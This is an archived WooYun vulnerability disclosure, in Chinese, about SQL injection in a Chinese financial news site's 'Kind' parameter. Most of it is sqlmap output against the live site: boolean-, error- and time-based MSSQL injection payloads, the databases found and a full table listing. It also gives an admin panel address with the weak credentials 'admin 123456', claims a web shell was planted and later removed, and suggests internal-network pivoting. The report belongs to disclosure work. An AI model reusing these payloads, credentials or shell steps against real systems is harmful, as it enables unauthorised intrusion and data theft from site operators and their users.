乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-30: 细节已通知厂商并且等待厂商处理中 2015-11-04: 厂商已经确认,细节仅向厂商公开 2015-11-14: 细节向核心白帽子及相关领域专家公开 2015-11-24: 细节向普通白帽子公开 2015-12-04: 细节向实习白帽子公开 2015-12-19: 细节向公众公开
- -
注入点
http://**.**.**.**/News/Default.aspx?Kind=c00001http://**.**.**.**/hk/industrymore.aspx?q=Block
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: Kind (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Kind=c00001' AND 4379=4379 AND 'nWHD'='nWHD Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Kind=c00001' AND 9281=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9281=9281) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113))) AND 'FGZO'='FGZO Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: Kind=c00001' AND 8769=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'OYYN'='OYYN---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [14]:[*] His_TTGame[*] master[*] model[*] msdb[*] News[*] newstmpmessage[*] ReportServer[*] ReportServerTempDB[*] SHEX_Game[*] StockData[*] tempdb[*] Tsci_tt[*] tt180[*] TTGameDatabase: News+----------------------------------+---------+| Table | Entries |+----------------------------------+---------+| dbo.NS_MessageKinds_bak201508 | 1168587 || dbo.ObjectRelation | 1069242 || dbo.NS_MessageKinds | 466832 || dbo.NS_Message | 323364 || dbo.NS_Announcement | 264046 || dbo.Channel_Message | 195370 || dbo.NS_US_news | 139042 || dbo.NS_PickMessage | 124636 || dbo.View_KindNews | 120312 || dbo.NS_MessageKinds_bakJanyo | 105599 || dbo.NS_PickMessageHistory | 101098 || dbo.NS_MessageKinds20130523 | 94807 || dbo.Query | 87429 || dbo.TT_HKNotice | 86563 || dbo.UserSubscribeChannel | 54730 || dbo.TMP_PickMessage | 31699 || dbo.tmpall | 23181 || dbo.TT_News_Hot | 11734 || dbo.NS_RecordLog | 4512 || dbo.view_NewsLists | 3322 || dbo.TT_User | 3041 || dbo.TT_User_bak | 2457 || dbo.stockcode | 2022 || dbo.tempNS_PickMessage | 1921 || dbo.TT_CustomSTK | 1834 || dbo.News_Comments | 1228 || dbo.HotNewstag | 1065 || dbo.NS_NewsSendMsg | 1035 || dbo.TT_HKNotice_bak | 1000 || dbo.FocusNews | 791 || dbo.view_EveryDayEditCountByUser | 393 || dbo.TT_BBS | 298 || dbo.view_jyb_news_comments | 246 || dbo.TT_User_Do | 245 || dbo.GeneralWords | 238 || dbo.CommonChannel | 191 || dbo.view_jyb_hotNews | 42 || dbo.NS_NewsPageSettings | 31 || dbo.tmpaaaaa | 22 || dbo.V_PageSetings | 20 || dbo.NS_Admin | 19 || dbo.Company | 15 || dbo.NS_subKinds | 15 || dbo.View_IM_CompanyLists | 12 || dbo.LSB | 11 || dbo.NS_NewsMoveStat | 8 || dbo.tempExceptHot | 7 || dbo.D99_REG | 1 || dbo.NS_UserGetEditPickNews | 1 |+----------------------------------+---------+
getshell后台地址
http://**.**.**.**/admin/Default.aspx
admin 123456
数据库真多
好像可以内网渗透 - - 木马自行删除 没用下载任何东西
危害等级:中
漏洞Rank:10
确认时间:2015-11-04 14:32
暂未建立与网站管理单位的直接处置渠道,待认领。
暂无